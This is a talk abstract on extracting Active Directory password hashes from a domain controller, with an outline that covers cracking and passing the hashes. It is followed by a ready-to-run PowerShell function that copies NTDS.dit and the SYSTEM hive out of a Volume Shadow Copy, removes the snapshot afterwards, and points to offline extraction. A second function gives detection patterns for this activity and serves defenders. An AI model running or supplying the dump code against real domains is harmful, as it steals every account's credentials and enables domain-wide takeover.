BSidesLA talk where I explore methods of dumping Active Directory password hashes from a domain controller: using the Volume Shadow Copy Service (VSS) or direct disk access to copy the NTDS.dit, SYSTEM and SAM files off a running DC, even though those files are locked while the DC is up.

I give a history of the older methods, detail the newer ones, and present ideas for detecting them.

  • Evolution of getting password hashes
  • Non-injection methods
  • Getting your tools onto the DC
  • VSS & PowerShell
  • Volume Shadow Copy Service
  • PowerSploit NinjaCopy (direct disk access)
  • Export and extract
  • Crack them
  • Pass them
  • Detect vssown / NinjaCopy activity
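The VSS step of the outline above and the matching detection idea, as an added PowerShell example written for this page; it is not code from the talk, from vssown.vbs or from PowerSploit. It assumes an elevated PowerShell 5.1 session on the DC, the default NTDS.dit location (the real path is in the "DSA Database file" value under HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters), an output folder C:\Temp\dump, and, for the detection half, that PowerShell script block logging (event 4104) and process-creation auditing with command line (event 4688) are enabled. The function names, the folder and the keyword list are assumptions, not anything the talk names.

```powershell
# Added example, not from the talk: copy NTDS.dit and the SYSTEM hive out of a
# VSS snapshot on a live DC (the vssown approach), then hunt for traces of it.
# Assumptions: elevated session, default NTDS path, C:\Temp\dump exists or can
# be created, 4104 / 4688 logging enabled for Find-ShadowDumpActivity.

$DestDir    = 'C:\Temp\dump'                      # assumed output folder
$NtdsFile   = 'Windows\NTDS\ntds.dit'             # default; verify in NTDS\Parameters
$SystemHive = 'Windows\System32\config\SYSTEM'    # boot key needed to decrypt NTDS.dit

function New-ShadowDump {
    param([string]$Volume = 'C:\', [string]$Dest = $DestDir)

    New-Item -ItemType Directory -Path $Dest -Force | Out-Null

    # Win32_ShadowCopy.Create is the same WMI call vssown.vbs makes; no third-party tool needed.
    $r = Invoke-CimMethod -ClassName Win32_ShadowCopy -MethodName Create `
             -Arguments @{ Volume = $Volume; Context = 'ClientAccessible' }
    if ($r.ReturnValue -ne 0) { throw "Shadow copy creation failed, return code $($r.ReturnValue)" }

    $shadow = Get-CimInstance Win32_ShadowCopy | Where-Object ID -eq $r.ShadowID
    # DeviceObject looks like \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN
    $dev = $shadow.DeviceObject

    foreach ($rel in $NtdsFile, $SystemHive) {
        # Copy-Item cannot open \\?\GLOBALROOT paths, so copy through cmd.exe.
        # The snapshot is read-only, so the locked originals are never touched.
        cmd.exe /c "copy `"$dev\$rel`" `"$Dest\`"" | Out-Null
    }

    # Remove the snapshot so it does not linger on the DC after the copy.
    $shadow | Remove-CimInstance

    # Return the files that were pulled; feed them to your offline extractor next.
    Get-ChildItem -Path $Dest
}

function Find-ShadowDumpActivity {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)

    # Strings that show up in script blocks from vssown-style or NinjaCopy-style scripts.
    # NinjaCopy reads the raw volume (\\.\C:) and never creates a snapshot, so script
    # block logging is the main place it leaves a trace. Keyword list is an assumption.
    $scriptPatterns = 'Win32_ShadowCopy', 'HarddiskVolumeShadowCopy',
                      'Invoke-NinjaCopy', 'vssown', 'ntds\.dit', '\\\\\.\\[A-Za-z]:'

    $scriptHits = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
                      LogName = 'Microsoft-Windows-PowerShell/Operational'
                      Id = 4104; StartTime = $since } |
                  Where-Object { $m = $_.Message; ($scriptPatterns | Where-Object { $m -match $_ }) }

    # Native tooling that creates or exposes snapshots; needs "include command line" auditing.
    $procHits = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
                    LogName = 'Security'; Id = 4688; StartTime = $since } |
                Where-Object { $_.Message -match 'vssadmin.*create shadow|wmic.*shadowcopy.*create|diskshadow|ntdsutil' }

    @($scriptHits) + @($procHits) |
        Sort-Object TimeCreated |
        Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }
}

# Usage on the DC:
#   New-ShadowDump                      # pulls ntds.dit and SYSTEM into C:\Temp\dump
#   Find-ShadowDumpActivity -Hours 48   # lists 4104 / 4688 events that look like a dump
```

The copy half needs nothing beyond WMI and cmd.exe, which is the whole point of the "getting your tools onto the DC" discussion: there is no binary to drop. The detection half is only as good as the audit configuration; without script block logging the NinjaCopy branch sees nothing, and without command-line auditing 4688 will not distinguish vssadmin create shadow from an ordinary vssadmin list.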